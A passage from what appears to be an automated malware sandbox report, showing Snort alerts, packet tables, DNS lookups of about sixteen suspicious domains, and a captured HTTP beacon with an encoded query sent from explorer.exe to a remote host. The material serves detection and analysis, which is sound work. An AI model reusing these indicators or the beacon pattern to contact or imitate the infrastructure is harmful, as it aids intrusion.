COMDLG32.dll	ReplaceTextW, ReplaceTextA, PrintDlgW, PrintDlgExW, CommDlgExtendedError, PrintDlgExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/21/20-09:23:25.026355	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49730	34.102.136.180	192.168.2.3
11/21/20-09:24:08.218798	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49750	13.248.196.204	192.168.2.3
11/21/20-09:24:23.844414	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49752	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 09:23:14.097827911 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.234519958 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.234675884 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.234828949 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.371210098 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.377899885 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.377935886 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.377959967 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:14.378113031 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.378142118 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.378202915 CET	49727	80	192.168.2.3	74.208.236.115
Nov 21, 2020 09:23:14.514729977 CET	80	49727	74.208.236.115	192.168.2.3
Nov 21, 2020 09:23:19.560575008 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.694499969 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.694645882 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.695023060 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.828794003 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.834455013 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.834506989 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:19.834763050 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.834836960 CET	49729	80	192.168.2.3	192.185.213.99
Nov 21, 2020 09:23:19.968734026 CET	80	49729	192.185.213.99	192.168.2.3
Nov 21, 2020 09:23:24.894366026 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:24.911004066 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:24.911156893 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:24.911351919 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:24.927881956 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:25.026355028 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:25.026390076 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:25.026591063 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:25.026663065 CET	49730	80	192.168.2.3	34.102.136.180
Nov 21, 2020 09:23:25.043345928 CET	80	49730	34.102.136.180	192.168.2.3
Nov 21, 2020 09:23:30.204859018 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.341794014 CET	80	49736	208.91.197.160	192.168.2.3
Nov 21, 2020 09:23:30.341933012 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.342092037 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.514624119 CET	80	49736	208.91.197.160	192.168.2.3
Nov 21, 2020 09:23:30.514862061 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.514910936 CET	49736	80	192.168.2.3	208.91.197.160
Nov 21, 2020 09:23:30.652647018 CET	80	49736	208.91.197.160	192.168.2.3
Nov 21, 2020 09:23:35.572374105 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.598022938 CET	80	49742	160.153.136.3	192.168.2.3
Nov 21, 2020 09:23:35.598149061 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.598393917 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.624041080 CET	80	49742	160.153.136.3	192.168.2.3
Nov 21, 2020 09:23:35.624209881 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.624253035 CET	49742	80	192.168.2.3	160.153.136.3
Nov 21, 2020 09:23:35.649920940 CET	80	49742	160.153.136.3	192.168.2.3
Nov 21, 2020 09:23:40.967447996 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.173218966 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:41.173377037 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.173491001 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.379344940 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:41.384908915 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:41.386229992 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.386396885 CET	49743	80	192.168.2.3	168.206.180.179
Nov 21, 2020 09:23:41.592365026 CET	80	49743	168.206.180.179	192.168.2.3
Nov 21, 2020 09:23:46.567965984 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.680968046 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.681092024 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.681252956 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.793874025 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.794529915 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.794562101 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:46.794747114 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.794909000 CET	49744	80	192.168.2.3	3.138.72.189
Nov 21, 2020 09:23:46.907485962 CET	80	49744	3.138.72.189	192.168.2.3
Nov 21, 2020 09:23:51.984683990 CET	49745	80	192.168.2.3	119.81.172.165
Nov 21, 2020 09:23:52.176573992 CET	80	49745	119.81.172.165	192.168.2.3
Nov 21, 2020 09:23:52.176731110 CET	49745	80	192.168.2.3	119.81.172.165
Nov 21, 2020 09:23:52.176956892 CET	49745	80	192.168.2.3	119.81.172.165
Nov 21, 2020 09:23:52.368932962 CET	80	49745	119.81.172.165	192.168.2.3
Nov 21, 2020 09:23:52.368985891 CET	80	49745	119.81.172.165	192.168.2.3
Nov 21, 2020 09:23:57.449476004 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.488097906 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.488246918 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.488390923 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.526587009 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.585954905 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586019993 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586061954 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586092949 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586122036 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:23:57.586267948 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.586354971 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.586365938 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.586369991 CET	49746	80	192.168.2.3	35.246.6.109
Nov 21, 2020 09:23:57.624963999 CET	80	49746	35.246.6.109	192.168.2.3
Nov 21, 2020 09:24:02.661523104 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.763997078 CET	80	49748	54.208.77.124	192.168.2.3
Nov 21, 2020 09:24:02.764127970 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.764219999 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.868865013 CET	80	49748	54.208.77.124	192.168.2.3
Nov 21, 2020 09:24:02.869981050 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.870037079 CET	49748	80	192.168.2.3	54.208.77.124
Nov 21, 2020 09:24:02.972486973 CET	80	49748	54.208.77.124	192.168.2.3
Nov 21, 2020 09:24:08.059351921 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.075472116 CET	80	49750	13.248.196.204	192.168.2.3
Nov 21, 2020 09:24:08.075654030 CET	49750	80	192.168.2.3	13.248.196.204
Nov 21, 2020 09:24:08.075890064 CET	49750	80	192.168.2.3	13.248.196.204

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 09:22:24.581501007 CET	64185	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:24.619348049 CET	53	64185	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:25.406692028 CET	65110	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:25.442279100 CET	53	65110	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:26.529371023 CET	58361	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:26.556273937 CET	53	58361	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:28.236915112 CET	63492	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:28.264113903 CET	53	63492	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:44.490503073 CET	60831	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:44.526331902 CET	53	60831	8.8.8.8	192.168.2.3
Nov 21, 2020 09:22:51.779208899 CET	60100	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:22:51.806281090 CET	53	60100	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:00.907176018 CET	53195	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:00.934344053 CET	53	53195	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:01.113241911 CET	50141	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:01.150213003 CET	53	50141	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:01.818069935 CET	53023	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:01.845236063 CET	53	53023	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:02.775262117 CET	49563	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:02.802472115 CET	53	49563	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:05.000329018 CET	51352	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:05.044382095 CET	53	51352	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:05.992248058 CET	59349	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:06.027966022 CET	53	59349	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:06.788253069 CET	57084	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:06.815381050 CET	53	57084	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:07.597861052 CET	58823	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:07.633567095 CET	53	58823	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:08.636363983 CET	57568	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:08.663465023 CET	53	57568	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:09.419197083 CET	50540	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:09.446274042 CET	53	50540	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:14.053543091 CET	54366	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:14.092390060 CET	53	54366	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:15.523149014 CET	53034	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:15.558841944 CET	53	53034	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:19.394763947 CET	57762	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:19.558604956 CET	53	57762	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:24.852360010 CET	55435	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:24.892208099 CET	53	55435	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:24.973694086 CET	50713	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:24.974024057 CET	56132	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:25.011109114 CET	53	56132	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:25.011164904 CET	53	50713	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:27.058589935 CET	58987	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:27.085989952 CET	53	58987	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:30.053802013 CET	56579	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:30.203284979 CET	53	56579	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:30.857566118 CET	60633	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:30.893316984 CET	53	60633	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:35.519464970 CET	61292	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:35.570893049 CET	53	61292	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:40.629240990 CET	63619	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:40.966485977 CET	53	63619	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:46.414911985 CET	64938	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:46.565484047 CET	53	64938	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:51.808078051 CET	61946	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:51.982304096 CET	53	61946	8.8.8.8	192.168.2.3
Nov 21, 2020 09:23:57.386825085 CET	64910	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:23:57.447319984 CET	53	64910	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:02.145009041 CET	52123	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:02.172174931 CET	53	52123	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:02.619760990 CET	56130	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:02.660164118 CET	53	56130	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:04.151099920 CET	56338	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:04.186832905 CET	53	56338	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:07.887969017 CET	59420	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:08.056883097 CET	53	59420	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:13.227334976 CET	58784	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:13.268898010 CET	53	58784	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:23.669981956 CET	63978	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:23.709835052 CET	53	63978	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:28.852160931 CET	62938	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:29.182164907 CET	53	62938	8.8.8.8	192.168.2.3
Nov 21, 2020 09:24:34.865910053 CET	55708	53	192.168.2.3	8.8.8.8
Nov 21, 2020 09:24:34.901865005 CET	53	55708	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 21, 2020 09:23:14.053543091 CET	192.168.2.3	8.8.8.8	0xf435	Standard query (0)	www.ownumo.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:19.394763947 CET	192.168.2.3	8.8.8.8	0x6bec	Standard query (0)	www.trafegopago.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:24.852360010 CET	192.168.2.3	8.8.8.8	0x4af0	Standard query (0)	www.coveloungewineandwhiskey.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:24.974024057 CET	192.168.2.3	8.8.8.8	0x2122	Standard query (0)	cdn.onenote.net	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:30.053802013 CET	192.168.2.3	8.8.8.8	0x748d	Standard query (0)	www.covid19salivatestdirect.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:35.519464970 CET	192.168.2.3	8.8.8.8	0x9411	Standard query (0)	www.heartandcrowncloset.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:40.629240990 CET	192.168.2.3	8.8.8.8	0xb756	Standard query (0)	www.primeworldgroup.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.414911985 CET	192.168.2.3	8.8.8.8	0xaded	Standard query (0)	www.placeduconfort.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:51.808078051 CET	192.168.2.3	8.8.8.8	0xfde5	Standard query (0)	www.hyx20140813.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:57.386825085 CET	192.168.2.3	8.8.8.8	0x5efe	Standard query (0)	www.obsessingwealth.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.619760990 CET	192.168.2.3	8.8.8.8	0x8c1c	Standard query (0)	www.cashintl.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:07.887969017 CET	192.168.2.3	8.8.8.8	0xf834	Standard query (0)	www.namofast.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.227334976 CET	192.168.2.3	8.8.8.8	0x659b	Standard query (0)	www.plantpowered.energy	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:23.669981956 CET	192.168.2.3	8.8.8.8	0xcf74	Standard query (0)	www.capitalcitybombers.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:28.852160931 CET	192.168.2.3	8.8.8.8	0xfb2c	Standard query (0)	www.chemtradent.com	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:34.865910053 CET	192.168.2.3	8.8.8.8	0x80a6	Standard query (0)	www.sweetbasilmarketing.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 21, 2020 09:23:14.092390060 CET	8.8.8.8	192.168.2.3	0xf435	No error (0)	www.ownumo.com		74.208.236.115	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:19.558604956 CET	8.8.8.8	192.168.2.3	0x6bec	No error (0)	www.trafegopago.com	trafegopago.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:19.558604956 CET	8.8.8.8	192.168.2.3	0x6bec	No error (0)	trafegopago.com		192.185.213.99	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:24.892208099 CET	8.8.8.8	192.168.2.3	0x4af0	No error (0)	www.coveloungewineandwhiskey.com	coveloungewineandwhiskey.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:24.892208099 CET	8.8.8.8	192.168.2.3	0x4af0	No error (0)	coveloungewineandwhiskey.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:25.011109114 CET	8.8.8.8	192.168.2.3	0x2122	No error (0)	cdn.onenote.net	cdn.onenote.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:30.203284979 CET	8.8.8.8	192.168.2.3	0x748d	No error (0)	www.covid19salivatestdirect.com		208.91.197.160	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:35.570893049 CET	8.8.8.8	192.168.2.3	0x9411	No error (0)	www.heartandcrowncloset.com	heartandcrowncloset.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:35.570893049 CET	8.8.8.8	192.168.2.3	0x9411	No error (0)	heartandcrowncloset.com		160.153.136.3	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:40.966485977 CET	8.8.8.8	192.168.2.3	0xb756	No error (0)	www.primeworldgroup.com		168.206.180.179	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	www.placeduconfort.com	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.138.72.189	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.12.202.18	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:46.565484047 CET	8.8.8.8	192.168.2.3	0xaded	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.134.22.63	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:51.982304096 CET	8.8.8.8	192.168.2.3	0xfde5	No error (0)	www.hyx20140813.com	bailedao.leboweb.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:51.982304096 CET	8.8.8.8	192.168.2.3	0xfde5	No error (0)	bailedao.leboweb.com		119.81.172.165	A (IP address)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	www.obsessingwealth.com	www1.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	www1.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:57.447319984 CET	8.8.8.8	192.168.2.3	0x5efe	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.660164118 CET	8.8.8.8	192.168.2.3	0x8c1c	No error (0)	www.cashintl.com		54.208.77.124	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.660164118 CET	8.8.8.8	192.168.2.3	0x8c1c	No error (0)	www.cashintl.com		34.206.12.234	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:02.660164118 CET	8.8.8.8	192.168.2.3	0x8c1c	No error (0)	www.cashintl.com		35.169.58.188	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:08.056883097 CET	8.8.8.8	192.168.2.3	0xf834	No error (0)	www.namofast.com		13.248.196.204	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	www.plantpowered.energy	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:13.268898010 CET	8.8.8.8	192.168.2.3	0x659b	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:23.709835052 CET	8.8.8.8	192.168.2.3	0xcf74	No error (0)	www.capitalcitybombers.com	capitalcitybombers.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:24:23.709835052 CET	8.8.8.8	192.168.2.3	0xcf74	No error (0)	capitalcitybombers.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:29.182164907 CET	8.8.8.8	192.168.2.3	0xfb2c	No error (0)	www.chemtradent.com		45.194.171.26	A (IP address)	IN (0x0001)
Nov 21, 2020 09:24:34.901865005 CET	8.8.8.8	192.168.2.3	0x80a6	No error (0)	www.sweetbasilmarketing.com	sweetbasilmarketing.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:24:34.901865005 CET	8.8.8.8	192.168.2.3	0x80a6	No error (0)	sweetbasilmarketing.com		185.201.11.126	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ownumo.com

www.trafegopago.com

www.coveloungewineandwhiskey.com

www.covid19salivatestdirect.com

www.heartandcrowncloset.com

www.primeworldgroup.com

www.placeduconfort.com

www.hyx20140813.com

www.obsessingwealth.com

www.cashintl.com

www.namofast.com

www.plantpowered.energy

www.capitalcitybombers.com

www.chemtradent.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49727	74.208.236.115	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:14.234828949 CET	232	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1 Host: www.ownumo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:14.377899885 CET	233	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Sat, 21 Nov 2020 08:23:14 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 